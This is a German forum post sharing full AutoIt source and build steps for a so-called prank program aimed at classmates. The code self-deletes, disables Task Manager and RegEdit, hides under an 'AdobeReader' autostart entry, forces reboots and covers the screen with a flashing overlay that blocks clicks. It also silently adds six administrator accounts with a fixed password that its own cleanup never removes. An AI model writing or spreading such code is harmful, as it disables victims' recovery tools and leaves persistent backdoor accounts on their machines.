Servus,
ja ich bins schon wieder, das skript vorhin war nur ein Teilskript von einem größerem "Projekt".
Auf die Idee hat mich ein Freund gebracht, der einfach mal paar Klassenkollegen ärgern wollte.
Ich warne euch, macht es bloß bei Freunden und guten Kumpels, niemals bei Fremden oder Leuten die etwas gegen sowas haben. Dies ist als Scherz für ein paar Minuten, Stunden gut, nicht um jmd unendlich lange zu quälen und ihn sehr sehr sauer zu machen!!!.
Zuerst der Aufbau/das Prinzip:
1. Am Anfang ist es eine Exe, diese muss angestartet werden, daraufhin wird eine Datei, die main.exe heißt, in den Windowsordner unter den Namen mainly.exe kopiert.
2. Die mainly.exe löscht die Exe aus Schritt 1.
Der Taskmanager, RegEdit und den die Funktion zum Hintergrund ändern werden gesperrt.
Es werden 6 Benutzer angelegt mit den Namen 0wn3r 0-5 und dem Passwort 0wn3d und gleich der Gruppe Administratoren hinzugefügt (sofern Adminrechte vorhanden)
3. Es wird das Bild To.jpg (könnt ihr auch selbst erstellen) mit Owned!! in grüner Schrift und pinkem Hintergrund kopiert und als Desktophintergrund eingerichtet. Davor wird noch schnell die vorherige Einstellung gesichert.
4. Mainly.exe kopiert auch noch zusätzlich die Flash.exe und die Clean.exe in Systemordner.
Die Flash.exe wird dann gleich auch noch in den Autostart in der Registry geschrieben und danach wird der Rechner neu gestartet, dass das Hintergrundbild auf jeden Fall übernommen wird.
5. Die Flash.exe löscht die mainly.exe, da diese nicht mehr benötigt wird und verursacht Augenkrebs, verhindert, dass man mit der Maus i-wo hinklicken kann. (siehe auch hier , auch wenn hier noch eine Funktion zum Beenden dabei ist.)
6. Sobald genug von dem ganzen Mist hat macht man folgendes:
Windows+R drücken, cmd eingeben und enter drücken, ichbinsodoof eingeben und der Spuk ist vorbei. Die clean.exe wurde vorhin nämlich unter System32 kopiert und umbenannt in ichbinsodoof.exe (deswegen ist sie auch über cmd direkt aufruftbar).
7. clean/ichbinsodoof.exe löscht die ganzen Registryeinträge wieder, ändert den Bildschirmhintergrund zurück, stoppt den augenkrebs, aktiviert wieder taksmanager, RegEdit und die Funktion zum Hintergrund ändern, löscht die ganzen Dateien bis auf die sich selbst und installiert noch eine Datei in den temporären Ordner, die rest.exe.
8. rest.exe löscht die clean/ichbinsodoof.exe und startet den Rechner neu (temp wird geleert)
9. TaDaaa, keine Spuren mehr vorhanden und alles ist wieder rückgänig gemacht, aber wehe dem Notebookuser der keine Windowstaste hat, der darf über abgesicherten Modus im Notfall reingehen und dies eingeben.
Hier die Skripte:
1. main_install.au3 als Exe ist hier "1. Am Anfang ist es eine Exe,..." gemeint.
Spoiler anzeigen
#NoTrayIcon
$path = @WindowsDir&"\mainly.exe"
FileInstall("main.exe",$path,1)
$info = @WindowsDir&"\Web\Information.txt"
If FileExists($info) = 1 Then FileDelete($info)
FileWriteLine($info,@ScriptName&@LF&@ScriptDir)
ShellExecute($path)
2. Das main Skript bzw. exe, die dann später auch die mainly.exe wird:
Spoiler anzeigen
#NoTrayIcon
$1 = FileReadLine(@WindowsDir&"\Web\Information.txt",1)
$2 = FileReadLine(@WindowsDir&"\Web\Information.txt",2)
$filemain= $2&"\"&$1
$counter = 0
While FileExists($filemain) = 1
FileDelete($filemain)
sleep(500)
$counter +=1
If $counter = 30 Then ExitLoop
WEnd
sleep(3000)
$policies="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\"
$backgr = $policies&"System"
$tskmgr = $policies&"System"
$regedit = $policies&"System"
RegWrite($tskmgr,"DisableTaskMgr","REG_DWORD","1")
RegWrite($regedit,"DisableRegistryTools","REG_DWORD","1")
RegWrite($backgr,"NoDispBackgroundPage","REG_DWORD","1")
;ja, ich weiß, ich hätte es mit einer For-Schleife und Arrays kürzer machen können
RunWait(@ComSpec&" /c "&'net user "0wn3r0" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r0" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r1" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r1" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r2" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r2" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r3" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r3" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r4" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r4" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net user "0wn3r5" "0wn3d" /add',"",@SW_HIDE)
RunWait(@ComSpec&" /c "&'net localgroup Administratoren "0wn3r5" /add',"",@SW_HIDE)
FileInstall("flash.exe",@WindowsDir&"\Web\flash.exe",1)
FileInstall("clean.exe",@WindowsDir&"\System32\ichbinsodoof.exe",1)
$keyname3 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
$type = "REG_SZ"
RegWrite($keyname3,"AdobeReader",$type,@WindowsDir&"\Web\flash.exe")
$path = @WindowsDir&"\Web\Wallpaper\owned.jpg"
FileInstall("To.jpg",$path,1)
$keyname = "HKEY_CURRENT_USER\Control Panel\Desktop"
$valuename = "ConvertedWallpaper"
RegWrite($keyname,$valuename,$type,$path)
sleep(5000)
RunWait(@ComSpec&" /c "&'shutdown -f -r -t 10',"",@SW_HIDE)
3. die Flash die mit der main.exe "installiert" wird:
Spoiler anzeigen
#NoTrayIcon
#include <GUIConstants.au3>
#Include <Constants.au3>
$count = 0
While FileExists(@WindowsDir&"\mainly.exe") = 1
FileDelete(@WindowsDir&"\mainly.exe")
sleep(500)
If $count = 30 Then Exit
$count += 1
WEnd
$sleep = 300
[/autoit] [autoit][/autoit] [autoit]$GUI = GuiCreate("Rahmen",@DesktopWidth,@DesktopHeight,0,0,$WS_POPUP,BitOR($WS_EX_TOPMOST,$WS_EX_TOOLWINDOW))
$colour1 = 0xFF00FF
$colour2 = 0x00FF00
WinSetTrans("Rahmen","",150)
$Rahmen = GUICtrlCreateLabel('',0,0,@DesktopWidth,@DesktopHeight,$SS_SUNKEN)
GUISetState(@SW_SHOW,$GUI)
While 1
GUICtrlSetBkColor($Rahmen,$colour1)
sleep($sleep)
GUICtrlSetBkColor($Rahmen,$colour2)
sleep($sleep)
WEnd
4. das saubermache skript sprich die clean.exe bzw. dann anstarten der exe, die ichbinsodoof.exe:
Spoiler anzeigen
#NoTrayIcon
$policies="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\"
$backgr = $policies&"System"
$tskmgr = $policies&"System"
$regedit = $policies&"System"
RegDelete($tskmgr,"DisableTaskMgr")
RegDelete($regedit,"DisableRegistryTools")
RegDelete($backgr,"NoDispBackgroundPage")
$keyname = "HKEY_CURRENT_USER\Control Panel\Desktop"
$valuename = "ConvertedWallpaper"
$type = "REG_SZ"
$backgr = @WindowsDir&"\Web\Background.txt"
If FileExists($backgr) = 1 Then
$path= FileReadLine($backgr,1)
RegWrite($keyname,$valuename,$type,$path)
EndIf
$keyname = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RegDelete($keyname,"AdobeReader")
$1 = @WindowsDir&"\Web\Wallpaper\owned.jpg"
$3 = @WindowsDir&"\Web\flash.exe"
If FileExists($1) = 1 Then FileDelete($1)
If ProcessExists("flash.exe") = 1 Then ProcessClose("flash.exe")
sleep(4000)
If FileExists($3) = 1 Then FileDelete($3)
FileInstall("rest.exe",@TempDir&"\done.exe")
ShellExecute(@TempDir&"\done.exe")
und zu guter letzt:
5. die rest.exe, um wirklich keine Spuren zu hinterlassen:
Spoiler anzeigen
#NoTrayIcon
sleep(5000)
FileDelete(@WindowsDir&"\System32\ichbinsodoof.exe")
RunWait(@ComSpec&" /c "&'shutdown -f -r -t 02',"",@SW_HIDE)
Beim Kompilieren nur aufpassen, dass ihr zuerst mit 5. anfängt, dann 4., 3., 2. und zuletzt 1. sonst gehts nicht, weil es die Exen nicht findet.
Viel Spaß damit und stellt nicht zu viel Blödsinn an
Gruß Patrick
ps: im Anhang hab ich noch die Skripte reingepackt, für die, die zu faul sind für Copy&Paste
edit: Bild hat nicht reingepasst, macht euch einfach mit paint ein krasspinkes Bild mit grüner Schrift Owned (800x600) und speichert euch dieses als To.jpg ab.
edit2: wo anders hochgeladen
[Blockierte Grafik: http://member.file-upload.net/Stormy/thumb/To.jpg]
autoit.de/wcf/attachment/2184/
autoit.de/wcf/attachment/2185/
autoit.de/wcf/attachment/2186/
autoit.de/wcf/attachment/2187/
autoit.de/wcf/attachment/2188/